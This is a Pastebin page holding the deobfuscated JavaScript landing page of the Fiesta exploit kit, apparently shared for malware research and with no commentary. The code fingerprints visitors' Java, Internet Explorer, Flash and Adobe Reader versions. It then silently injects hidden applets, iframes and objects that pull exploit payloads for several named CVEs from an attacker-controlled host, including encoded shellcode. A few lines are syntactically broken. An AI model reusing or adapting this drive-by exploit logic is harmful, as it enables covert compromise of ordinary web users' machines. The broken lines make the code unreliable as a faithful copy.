API tools faq
paste
Advertisement
ydklijnsma

Fiesta Exploit Kit Deobfuscated Landing Page

ydklijnsma
Sep 26th, 2013
5,722
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 13.66 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.         Multi-purpose functions
  3. */
  4.  
  5. function EmbedPayload(payload_code) {
  6.     var payload_div = window.document.createElement('div');
  7.     window.document.body.appendChild(payload_div);
  8.     payload_div.innerHTML = payload_code;
  9. }
  10.  
  11. function GenActiveXObject(ax_objects) {
  12.     if (typeof window.ActiveXObject != 'undefined')) {
  13.         for (var i = 0; i < ax_objects.length; i++) {
  14.             try {
  15.                 var nax_obj = new ActiveXObject(ax_objects[i]);
  16.                 if (nax_obj) return nax_obj
  17.             } catch (exc) {}
  18.         }
  19.     }
  20.     return null
  21. }
  22.  
  23. function CheckStrForInts(g) {
  24.     return (typeof g == 'string' && (/\d/).test(g));
  25. }
  26.  
  27. function ExtractVersionNumbers(vers_string) {
  28.     var integer_matches = CheckStrForInts(vers_string) ? RegExp('[\d][\d\.\_,-]*', '').exec(vers_string) : null;
  29.     return integer_matches ? integer_matches[0].replace(RegExp('[\.\_,-]', 'g'), ',') : null
  30. }
  31.  
  32. /*
  33.         Oracle Java Exploitation
  34. */
  35.  
  36. if (window.navigator.plugins.length || window.ActiveXObject || window.navigator.javaEnabled()) {
  37.     function GetJavaVersion() {
  38.         var jvms = null;
  39.         try {
  40.             var java_object_class_ids = ['clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA', 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'];
  41.             for (var clsid = 0; clsid < java_object_class_ids.length; clsid++) {
  42.                 var java_object = window.document.createElement('object');
  43.                 java_object.classid = java_object_class_ids[clsid];
  44.                 window.document.body.appendChild(java_object);
  45.                 if (typeof java_object.jvms != 'undefined') {
  46.                     jvms = java_object.jvms;
  47.                     break
  48.                 }
  49.             }
  50.             if (jvms != null && jvms.getLength() != 0) {
  51.                 var version_str = ExtractVersionNumbers(jvms.get(jvms.getLength() - 1).version).split(/[\.\_,-]/g).concat(['0', '0', '0', '0']);
  52.                 while (version_str[3].length < 2) {
  53.                     version_str[3] = '0' + version_str[3]
  54.                 }
  55.                 return parseInt(version_str[1].concat(version_str[3]))
  56.             }
  57.         } catch (exc) {}
  58.         return null
  59.     }
  60.     var java_version = GetJavaVersion();
  61.  
  62.     function Java_Exploit_1() {
  63.         if (window.navigator.javaEnabled()) {
  64.             if (java_version > 630 && java_version < 646) { // CVE-2013-2463
  65.                 var payload = "<applet archive='http://<domain>.tld/zxj3iyd/?1950629bd060b3665e56570b04090d52070b020b02500959040b010255560001' code='mowazo' width=10 height=10><param name='med' value='http://<domain>.tld/zxj3iyd/?6a97e0f87979312555195c0c570b520800530e0c5152560303530d0506545f5b;1;4@@'/></applet>";
  66.                 EmbedPayload(payload)
  67.             } else if (java_version >= 700 && java_version < 718) { // CVE-2013-1493
  68.                 var payload = "<applet width=10 height=10><param name='med' value='http://<domain>.tld/zxj3iyd/?6a97e0f87979312555195c0c570b520800530e0c5152560303530d0506545f5b;1;4@@'/><param name='jnlp_href' value='a.jnlp'/><param name='jnlp_embedded' value='PD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0ndXRmLTgnPz48am5scCBzcGVjPScxLjAnIHhtbG5zOmpmeD0naHR0cDovL2phdmFmeC5jb20nIGhyZWY9J2Euam5scCc+PGluZm9ybWF0aW9uPjx0aXRsZT5hPC90aXRsZT48dmVuZG9yPmE8L3ZlbmRvcj48L2luZm9ybWF0aW9uPjxyZXNvdXJjZXM+PGoyc2UgdmVyc2lvbj0nMS43KycgaHJlZj0naHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZScvPjxqYXIgaHJlZj0naHR0cDovL2RlaWRmb29sb3dpbmdob29nLnVzL3p4ajNpeWQvPzE5NTA2MjliZDA2MGIzNjY1ZTU2NTcwYjA0MDkwZDUyMDcwYjAyMGIwMjUwMDk1OTA0MGIwMTAyNTU1NjAwMDEnIG1haW49J3RydWUnLz48L3Jlc291cmNlcz48YXBwbGV0LWRlc2MgbmFtZT0nYScgbWFpbi1jbGFzcz0nbW93YXpvJyB3aWR0aD0nMTAnIGhlaWdodD0nMTAnPjxwYXJhbSBuYW1lPSdfX2FwcGxldF9zc3ZfdmFsaWRhdGVkJyB2YWx1ZT0ndHJ1ZSc+PC9wYXJhbT48L2FwcGxldC1kZXNjPjwvam5scD4='/></applet>";
  69.                 EmbedPayload(payload)
  70.             }
  71.         }
  72.         return
  73.     }
  74.     Java_Exploit_1();
  75.  
  76.     // CVE-2012-0507
  77.     function Java_Exploit_2() {
  78.         if ((java_version && java_version < 631) || (!java_version && window.navigator.javaEnabled())) {
  79.             var payload = "<applet archive='http://<domain>.tld/zxj3iyd/?694ce1b111ccfee5574b5558570a5601000b03585153520a030b005106555b52' code='jabher' width=10 height=10><param name='ski' value='http://<domain>.tld/zxj3iyd/?0bf013f579793125531a030b030852050650510b0551560e0550520252575f56;1;2@@'/><param name='lox' value='aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200065b4c61726d3bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003'/></applet>";
  80.             EmbedPayload(payload)
  81.         }
  82.         return
  83.     }
  84.     Java_Exploit_2();
  85.  
  86.     /*
  87.         Microsoft Internet Explorer Exploitation
  88.     */
  89.    
  90.     function TestBrowserVersion() {
  91.         try {
  92.             var useragent = window.navigator.userAgent.toLowerCase();
  93.             var msie = /MSIE[\/\s]\d+/useragent .test(useragent);
  94.             var win64 = /Win64;/useragent .test(useragent);
  95.             var trident = /Trident\/(\d)/useragent .test(useragent) ? parseInt(RegExp.$1) : null;
  96.             if (!win64 && msie && trident && (trident == 6 || trident == 5 || trident == 4)) {
  97.                 return true
  98.             }
  99.         } catch (exc) {}
  100.         return false
  101.     }
  102.  
  103.     // CVE-2013-2551
  104.     function MSIE_Exploit() {
  105.         var pa;
  106.         if (TestBrowserVersion()) {
  107.             pa = window.document.createElement('iframe');
  108.             pa.frameBorder = '0';
  109.             pa.width = 10;
  110.             pa.height = 10;
  111.             pa.src = "http://<domain>.tld/zxj3iyd/?2a59067246c00d795b045902020d030204530202045407090753010b53520e51";
  112.             window.document.body.appendChild(pa)
  113.         }
  114.         return
  115.     }
  116.     MSIE_Exploit();
  117.  
  118.     /*
  119.         Adobe ShockwaveFlash Exploitation
  120.     */
  121.    
  122.     function GetFlashVersion() {
  123.         var return_version = null;
  124.         var flash_obj = GenActiveXObject('ShockwaveFlash.ShockwaveFlash');
  125.         if (flash_obj) {
  126.             try {
  127.                 var flash_version = flash_obj.GetVariable('$version');
  128.                 flash_version = flash_version.split(' ')[1].split(',');
  129.                 return_version = flash_version.slice(0, 3).join('');
  130.                 while (return_version.length < 6) {
  131.                     return_version += '0'
  132.                 }
  133.                 return [return_version, flash_version[3]]
  134.             } catch (exc) {}
  135.         }
  136.         return null
  137.     }
  138.  
  139.     // CVE-2013-0634
  140.     function Flash_Exploit() {
  141.         var flash_version = GetFlashVersion();
  142.         if (flash_version != null && flash_version[0] < 116000) {
  143.             var payload = "<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10><param name='movie' value='http://<domain>.tld/zxj3iyd/?0d0e4853496a38d04313565e060301030656075e005a050805560457575c0c50'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='ooh=60eb1c5a89d689d7803ee9740bb981030000ac34f9aae2faffd2618d65d4c3e8dfffffff10f2faf9f9a7ac701c919697f9f9918c8b9594ad9177b7f71591ee33d29711adfbf9f9a0a0919c16b6fca91169fbf9f9a993ff93f991e2ff31f4911fc38ed711cafbf9f9c8224ee993b9aaaa93f991ad33566891ee33d29711e3fbf9f96e919878203691ee33d29711f3fbf9f9c5ff85e9aaae1144f9f9f97905d984fd93f812fb93f9afae117cf9f9f9af748dbeff1196f9f9f97c398caf93f2a0b08da9a87a8401f88de3af116af8f9f97c398ce3c8399d72b9e172b9cdc41dfbf9f98c22af112bf9f9f97c398d28a0a7c839bfc1bf068c03c1ff8c55aebebe9fc0fe8c003efec2f9c8f9748effa611ecf9f9f9303a93f99307916196b6c4910b228d54118df8f9f9c830a8a8aaafaea806ac053aac701c93f991dcf9aaf97019068cf5a9068cf19187b37a2e910b228d5411bff8f9f9303bf1f9ac701cafae478e12f2d8a9ad93f1930691f65ee7a0af11def8f9f9a3681ac57284f1a9ad068cf5ae93e0ab91a3972222af11f5f8f9f968a11ad806ce9134758e08af1102f9f9f9f64ff1b0a806ce91cb87ffd9af1110f9f9f972f168a6a7303bf1f9afaeac701c728ce9afbf9f7ac7f98c007487fa11e8f9f9f9d69ad98a8d988b8dd9dbdbd9dbdc8adbf9ae11b0060606748dbefbaeaf9187b37a2e910b228d541165f9f9f993c5a0d03574843da8aec8390a53a676fe938a9197f998f9918bf98cf9709ef591f80cec9b91ff1b54cb1194f9f9f970bef111e9f9f9f99af994f99df9d7f99cf981f99cf9f9f976bee9708eedae912421d7059103836c1d11c6f9f9f930a6a73bfdf9ac701c93ada0d035ae748455aec8390a53a674b6e993bd76f8aea8a9a9a9a9a9a9a9068cf19171074aef91ee33d29711fcf9f9f9a6303bfdf9a011f0f9f9f9a911c4f9f9f9a8061999c8399d72a9c972abf572abed728bd1c806c83955bf7c398df4c59885fbd5d93836f4f83e1212c285dddd72bbe972eb8c2270bddde5983bfdf9997295dddd72bcc572adfc81f81372b3e172a3d9f8121acdb072cd72f817c806c83905557d398dfe3836f4f83e120dc285ddd18c1872a3ddf8129f72f5b272a3e5f81272fd72f81170bddde5983bf1f91109050606918d8d89c3d6d69d9c909d9f969695968e90979e9196969ed78c8ad6838193ca90809dd6c6cdcccec09d9dcfc09ac0cdcdcfcaceccccc8cd9dcccbc9cbcccfcc9fc9cbc9c0c9cbc9cec9c9c9cbccc9c9cfc9cfc9cbc9c8c9cec9cac99bc9cec9c9c99fcc98c2c8c2caf9f9f9'/><param name='Play' value='true'/></object>";
  144.             EmbedPayload(payload)
  145.         }
  146.         return
  147.     }
  148.     Flash_Exploit();
  149.  
  150.     /*
  151.         Adobe PDF Exploitation
  152.     */
  153.    
  154.     function GetMimeType(s) {
  155.         var mime_plugin = null;
  156.         var ret_mimeobj = null;
  157.         var mimeobj = window.navigator.mimeTypes[s];
  158.         if (mimeobj) {
  159.             mime_plugin = mimeobj.enabledPlugin;
  160.             if (mime_plugin && (mime_plugin.name || mime_plugin.description)) {
  161.                 ret_mimeobj = mimeobj
  162.             }
  163.         }
  164.         return ret_mimeobj
  165.     }
  166.  
  167.     function CheckMimeType(mtype, regex_pattern) {
  168.         var ret_mimeobj = null;
  169.         var regex = RegExp(regex_pattern, 'i');
  170.         var mimeobj = GetMimeType(mtype);
  171.         if (mimeobj && (mimeobj = mimeobj.enabledPlugin) && (regex.test(mimeobj.description || '') || regex.test(mimeobj.name || ''))) {
  172.             ret_mimeobj = mimeobj;
  173.         }
  174.         return ret_mimeobj;
  175.     }
  176.  
  177.     function CheckMimePluginAvailability(plugins, plugin_type, regex_pattern) {
  178.         var result = false;
  179.         for (var i in plugins) {
  180.             if (plugins[i] && plugins[i].type && plugins[i].type == plugin_type) {
  181.                 result = true;
  182.                 break;
  183.             }
  184.         }
  185.         if (!result && CheckMimeType(plugin_type, regex_pattern)) {
  186.             result = true;
  187.         }
  188.         return result
  189.     }
  190.  
  191.     function JoinAdobePDFVersionNumbers(version_string) {
  192.         var version_integer = null;
  193.         if (CheckStrForInts(version_string)) {
  194.             var stripped_version = version_string.replace(/\s/g, '').split(RegExp('[\.\_,-]', 'g')).concat(['0', '0', '0', '0']);
  195.             for (var i = 0; i < 4; i++) {
  196.                 if (/^(0+)(.+)$/ .test(stripped_version[i])) {
  197.                     stripped_version[i] = RegExp.$2
  198.                 }
  199.                 if (i > 3 || !(/\d/).test(stripped_version[i])) {
  200.                     stripped_version[i] = '0'
  201.                 }
  202.             }
  203.             version_integer = stripped_version.slice(0, 4).join('')
  204.         }
  205.         return version_integer
  206.     }
  207.  
  208.     function GetAdobePDFVersion() {
  209.         var ec;
  210.         var adobe_pdf_version = null;
  211.         var version_string = null;
  212.         var adobe_pdf_tag_regexp = 'Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in';
  213.         ec = CheckMimeType('application/pdf', adobe_pdf_tag_regexp);
  214.         if (ec) {
  215.             version_string = ExtractVersionNumbers(ec.description) || ExtractVersionNumbers(ec.name);
  216.             if (!version_string) {
  217.                 if (CheckMimePluginAvailability(ec, 'application/vnd.adobe.pdfxml', adobe_pdf_tag_regexp)) {
  218.                     version_string = '9'
  219.                 } else {
  220.                     if (CheckMimePluginAvailability(ec, 'application/vnd.adobe.x-mars', adobe_pdf_tag_regexp)) {
  221.                         version_string = '8'
  222.                     }
  223.                 }
  224.             }
  225.             if (!version_string && !RegExp('opera', 'i').test(window.navigator.userAgent)) {
  226.                 version_string = '8'
  227.             }
  228.         }
  229.         if (typeof window.ActiveXObject != 'undefined') {
  230.             ec = GenActiveXObject(['AcroPDF.PDF', 'PDF.PdfCtrl']);
  231.             var version_string_regexp = RegExp('=\s*([\d\.]+)', 'g');
  232.             try {
  233.                 var pdf_object = window.document.createElement('object');
  234.                 pdf_object.setAttribute('classid', 'clsid:CA8A9780-280D-11CF-A24D-444553540000');
  235.                 pdf_object.setAttribute('src', '');
  236.                 var pdf_versions = (ec || pdf_object).GetVersions();
  237.                 for (var i = 0; i < 5; i++) {
  238.                     if (version_string_regexp.test(pdf_versions) && (!version_string || RegExp.$1 > version_string)) {
  239.                         version_string = RegExp.$1
  240.                     }
  241.                 }
  242.             } catch (exc) {}
  243.         }
  244.         if (version_string) {
  245.             adobe_pdf_version = JoinAdobePDFVersionNumbers(version_string)
  246.         }
  247.         return adobe_pdf_version
  248.     }
  249.    
  250.     // CVE-2011-2104
  251.     function AdobePDF_Exploit() {
  252.         var adobe_pdf_version = GetAdobePDFVersion();
  253.         if ((adobe_pdf_version >= 8000 && adobe_pdf_version < 8201) || (adobe_pdf_version >= 9000 && adobe_pdf_version < 9301)) {
  254.             var payload = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='http://<domain>.tld/zxj3iyd/?3dde2cf765b468345f0d065e005852070556535e0601560c0656505751075f54'/><embed src='http://<domain>.tld/zxj3iyd/?3dde2cf765b468345f0d065e005852070556535e0601560c0656505751075f54' type='application/pdf' width=10 height=10></embed></object>";
  255.             EmbedPayload(payload)
  256.         }
  257.         return
  258.     }
  259.     AdobePDF_Exploit();
  260. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!